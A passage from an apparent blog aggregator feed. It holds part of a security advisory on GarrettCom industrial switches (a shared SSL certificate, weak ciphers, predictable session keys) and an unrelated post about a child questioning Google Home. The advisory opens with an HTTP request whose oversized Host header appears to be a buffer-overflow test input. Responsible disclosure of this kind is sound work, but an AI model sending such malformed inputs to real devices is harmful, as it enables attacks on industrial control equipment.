Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

GarrettCom-04 - SSL Keys Shared Across Devices

Severity: Moderate

The SSL certificate on all devices running firmware version 4.6.0 is the same. This issue was previously reported and an advisory released by ICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web server certificate remains static in 4.6.0:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
openssl s_client -connect 192.168.0.5:443 -showcerts
CONNECTED(00000003)
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN = 192.168.1.2, emailAddress = gcisupport@belden.com
verify return:1
---
Certificate chain
0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=192.168.1.2/emailAddress=gcisupport@belden.com
i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=192.168.1.2/emailAddress=gcisupport@belden.com
-----BEGIN CERTIFICATE-----
MIIEtTCCA52gAwIBAgIBADANBgkqhkiG9w0BAQUFADCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
HhcNMTUxMDI3MTEyNzQ2WhcNMjUxMDI0MTEyNzQ2WjCBnTELMAkGA1UEBhMCVVMx
EzARBgNVBAgTCkNhbGlmb3JuaWExEDAOBgNVBAcTB0ZyZW1vbnQxDzANBgNVBAoT
BkJlbGRlbjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxFDASBgNVBAMTCzE5
Mi4xNjguMS4yMSQwIgYJKoZIhvcNAQkBFhVnY2lzdXBwb3J0QGJlbGRlbi5jb20w
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDFlt+j4OvpcgfdrFGnBxti
ds6r9sNEcR9JdAFbOmwybQkdqIw9Z9+teU/rixPocEE4gL8beNuw/D3lDc4RJ63m
1zuQ1riFOkTsz7koKQNWTh3CkIBE7843p5I/GVvhfR7xNCCmCWPdq+6/b3nhott5
oBeMLOjIWnjFgyVMsWR22JOYv+euWwr4oqZDLfBHjfipnu36J1E2kHLG3TL9uwyN
DUxtrIbvfi5tOxi8tx1bxZFQU1jxoQa725gO+1TOYzfSoY1a7/M0rMhJM1wFXak6
jbDbJLSv2TXMWrSJlGFUbCcKv3kE22zLcU/wx1Xl4a4NNvFW7Sf5OG2B+bFLr4fD
AgMBAAGjgf0wgfowHQYDVR0OBBYEFLtGmDWgd773vSkKikDFSz8VOZ7DMIHKBgNV
HSMEgcIwgb+AFLtGmDWgd773vSkKikDFSz8VOZ7DoYGjpIGgMIGdMQswCQYDVQQG
EwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEQMA4GA1UEBxMHRnJlbW9udDEPMA0G
A1UEChMGQmVsZGVuMRowGAYDVQQLExFUZWNobmljYWwgU3VwcG9ydDEUMBIGA1UE
AxMLMTkyLjE2OC4xLjIxJDAiBgkqhkiG9w0BCQEWFWdjaXN1cHBvcnRAYmVsZGVu
LmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4IBAQBAiuv06CMD
ij+9bEZAfmHftptG4UqsNgYIFZ1sN7HC6RBR9xy45fWVcQN3l3KiyddLsftbZSOa
CRPpzqgpF58hGwAa7+yQPOjOWf+uLc9Oyex6P9ewAo6c5iiYI865FSQ+QCY4xbD1
Uk/WFV2LKOzxkXPRcVB4KR81g8tSZF3E8llybhEngg7cvN3uHpO5a5U085xuBbcF
To9PSbGKyJ7UGESBTD6KxLWAxoD6VGRV2CAZa/F9RTbdG1ZbTUMvoEDmYqv7Pjv/
ApZzztLJlCyhVM4N/jh/Q/g1VaQWuzPpza6utjN5soUxeZYJB6KwzGUiLnyTNBJz
L4JtsUO8AcWb
-----END CERTIFICATE-----

Note that Belden Garrettcom has addressed this issue by reinforcing that users of the switches should install their own SSL certificates if they do not want to use the default certificate and key.

GarrettCom-05 - Weak SSL Ciphers Enabled

Severity: Moderate

Many of the SSL ciphers available for the switch are outdated or use insecure ciphers or hashes. Additionally, no key exchanges with perfect forward secrecy are offered, rendering all previous communications possibly compromised, given the issue reported above. Particularly of note is the use of 56-bit DES, RC4, and MD5-based MACs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
ssl3: AES256-SHA
ssl3: CAMELLIA256-SHA
ssl3: DES-CBC3-SHA
ssl3: AES128-SHA
ssl3: SEED-SHA
ssl3: CAMELLIA128-SHA
ssl3: RC4-SHA
ssl3: RC4-MD5
ssl3: DES-CBC-SHA
tls1: AES256-SHA
tls1: CAMELLIA256-SHA
tls1: DES-CBC3-SHA
tls1: AES128-SHA
tls1: SEED-SHA
tls1: CAMELLIA128-SHA
tls1: RC4-SHA
tls1: RC4-MD5
tls1: DES-CBC-SHA
tls1_1: AES256-SHA
tls1_1: CAMELLIA256-SHA
tls1_1: DES-CBC3-SHA
tls1_1: AES128-SHA
tls1_1: SEED-SHA
tls1_1: CAMELLIA128-SHA
tls1_1: RC4-SHA
tls1_1: RC4-MD5
tls1_1: DES-CBC-SHA
tls1_2: AES256-GCM-SHA384
tls1_2: AES256-SHA256
tls1_2: AES256-SHA
tls1_2: CAMELLIA256-SHA
tls1_2: DES-CBC3-SHA
tls1_2: AES128-GCM-SHA256
tls1_2: AES128-SHA256
tls1_2: AES128-SHA
tls1_2: SEED-SHA
tls1_2: CAMELLIA128-SHA
tls1_2: RC4-SHA
tls1_2: RC4-MD5
tls1_2: DES-CBC-SHA

GarrettCom-06 - Weak HTTP session key generation

Severity: Moderate

The HTTP session key generation is predictable due to the lack of randomness in the generation process. The key is generated by hashing the previous hash result with the current time unit with precision around 50 unit per second. The previous hash is replaced with a fixed salt for the first hash generation.

The vulnerability allows an attacker to predict the first key that's generated by the switch if he has some knowledge about when the key was generated. Alternatively, the vulnerability also enables privilege escalation attacks which predict all future keys by observing two consecutive key generations of lower privileges.

Timeline

Discovery

These issues were discovered by Andrew Griffiths, David Tomaschik, and Xiaoran Wang of the Google Security Assessments Team.

19 May 2017 7:00am GMT

Jono Bacon: Google Home: An Insight Into a 4-Year-Old’s Mind

Recently I got a Google Home (thanks to Google for the kind gift). Last week I recorded a quick video of me interrogating it:

Well, tonight I nipped upstairs quickly to go and grab something and as I came back downstairs I heard Jack, our vivacious 4-year-old asking it questions, seemingly not expecting daddy to be listening.

This is when I discovered the wild curiosity in a 4-year-old's mind. It included such size and weight questions as…

OK Google, how big is the biggest teddy bear?

…and…

OK Google, how much does my foot weigh?

…to curiosities about physics…

OK Google, can chickens fly faster than space rockets?

…to queries about his family…

OK Google, is daddy a mommy?

…and while asking this question he interrupted Google's denial of an answer with…

OK Google, has daddy eaten a giant football?

Jack then switched gears a little bit, out of likely frustration that Google seemed to "not have an answer for that yet" to all of his questions, and figured the more confusing the question, the more likely that talking thing in the kitchen would work:

OK Google, does a guitar make a hggghghghgghgghggghghg sound?

Google was predictably stumped with the answer. So, in classic Jack fashion, the retort was:

OK Google, banana peel.

While this may seem random, it isn't:

I would love to see the world through his eyes, it must be glorious.

The post Google Home: An Insight Into a 4-Year-Old's Mind appeared first on Jono Bacon.

19 May 2017 3:27am GMT